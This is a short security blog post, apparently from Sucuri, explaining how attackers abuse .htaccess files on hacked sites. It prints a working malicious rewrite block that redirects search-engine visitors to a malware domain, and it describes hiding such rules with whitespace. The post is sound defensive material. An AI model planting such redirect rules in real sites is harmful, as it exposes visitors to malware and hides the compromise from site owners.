Monday, May 30, 2011

Understanding .htaccess attacks – Part 1

Attackers have been using the .htaccess file for a while. They use this file to hide malware, to redirect search engines to their own sites (think blackhat SEO), and for many other purposes (hide backdoors, inject content, to modify the php.ini values, etc).
Why do they use the .htaccess file? For multiple reasons. First, the .htaccess is a hidden file (starting with a “.”), so some site owners might not find them in their FTP clients. Secondly, it is a powerful file that allows you to make multiple changes to the web server and PHP behavior. This makes a .htaccess the attack hard to find and to clean up.

1- Redirecting users coming from search engines to malware
This is the most simple type of .htaccess attack, and the one we see more often. This is what gets added to the .htaccess file of a hacked site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]

As you can see, it will check the referrer from anyone visiting the site and if the user came from a Google search (or yahoo or bing or any search engine), it will redirect the user to a page with malware (in this example http://villusoftreit.ru/in.cgi?3). Note that if you type the site directly in the address bar of your browser, nothing will happen. Why? It makes harder for the owner of the site to detect the attack, since they will probably type the site name, and not search for it on Google.

Below is another example of the same attack, but this time redirecting to http://globalpoweringgatheringon.com/in.php?n=30 (one of those Hilary kneber domains). Note that this time, they’v added hundreds of white spaces before the “RewriteCond” to make it harder to see in a text editor (We removed below to make easier to read in the post).

Read more: Sucuri